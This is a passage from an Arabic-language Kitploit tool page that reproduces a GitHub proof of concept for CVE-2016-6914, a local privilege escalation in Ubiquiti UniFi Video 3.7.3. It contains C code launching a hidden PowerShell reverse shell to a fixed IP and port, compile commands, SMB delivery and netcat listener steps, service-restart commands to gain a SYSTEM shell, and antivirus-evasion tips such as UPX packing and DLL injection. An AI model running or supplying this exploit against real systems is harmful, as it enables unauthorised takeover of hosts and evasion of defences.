Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2016-6914-UniFiVideo-LPE — CVE-2016-6914-UniFiVideo-LPE | Kitploit
أدوات/GitHubGitHub/cybermonkx/cve-2016-6914-unifivideo-lpe
تصعيد الامتيازاتالاستغلالاختبار الاختراقالتعلم والتعليمتطوير الحمولاتاستغلال الملفات الثنائية
GitHubcybermonkx/cve-2016-6914-unifivideo-lpe

CVE-2016-6914-UniFiVideo-LPE

CVE-2016-6914-UniFiVideo-LPE

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

CVE-2016-6914 - Ubiquiti UniFi Video 3.7.3 LPE PoC

🔥 نظرة عامة

يحتوي هذا المستودع على إثبات المفهوم (PoC) لـ CVE-2016-6914، وهي ثغرة تصعيد الامتيازات المحلية (LPE) تؤثر على Ubiquiti UniFi Video 3.7.3.

يمكن لمهاجم ذو صلاحيات منخفضة استبدال ملف ثنائي موثوق (taskkill.exe) داخل C:\ProgramData\unifi-video\ لتنفيذ كود ضار بصلاحيات SYSTEM.


⚡ الاستغلال

خطوات الاستغلال

1️⃣ استبدل taskkill.exe بـ حمولة ضارة (exploit.exe).
2️⃣ انتظر حتى يتم تشغيل خدمة UniFi Video أو أعد تشغيلها يدويًا.
3️⃣ يتم تنفيذ الحمولة الضارة، مما يمنح شل SYSTEM.


🚀 الحمولات المضمنة

  • ✅ شل عكسي PowerShell
  • ✅ شل عكسي Netcat
  • ✅ تقنيات تجاوز مضاد الفيروسات

📜 كود إثبات المفهوم (شل عكسي PowerShell)

تقوم هذه الحمولة باستبدال taskkill.exe وتشغيل شل عكسي.

root@kitploit:~
#include <windows.h>

int main() {
    system("powershell -NoP -W Hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.16.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\"");
    return 0;
}
✅ قم بالتجميع باستخدام MinGW:
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe
## 🛠️ تعليمات الاستخدام
1️⃣ إعداد مشاركة SMB (لتسليم الملفات عن بعد)
على Kali، قم بتشغيل:
impacket-smbserver share . -smb2support
2️⃣ تشغيل مستمع Netcat
nc -lvnp 4444
3️⃣ تسليم الحمولة إلى الجهاز الهدف
قم بتشغيل أوامر PowerShell التالية على الجهاز الهدف:
copy \\10.10.14.5\share\taskkill.exe C:\ProgramData\unifi-video\taskkill.exe
stop-service UnifiVideoService -Force
start-service UnifiVideoService
4️⃣ الحصول على شل SYSTEM
بمجرد التنفيذ، سيتم فتح شل SYSTEM على المستمع الخاص بك!

## 🛡️ تجاوز مضاد الفيروسات (AV)
لتجنب الكشف الأساسي من مضاد الفيروسات، جرب: ✔️ ضغط الملف التنفيذي (UPX):
upx --best --lzma exploit.exe
✔️ استخدام استدعاءات نظام بديلة بدلاً من system().
✔️ التضمين في عمليات شرعية باستخدام حقن DLL.

## ⚠️ إخلاء مسؤولية
📢 إثبات المفهوم هذا لأغراض تعليمية فقط!
🛑 الاستخدام غير المصرح به غير قانوني ويعاقب عليه القانون.
👨‍💻 استخدمه فقط بطريقة قانونية وأخلاقية.

Reference:https://www.exploit-db.com/exploits/43390
تنزيل الأداة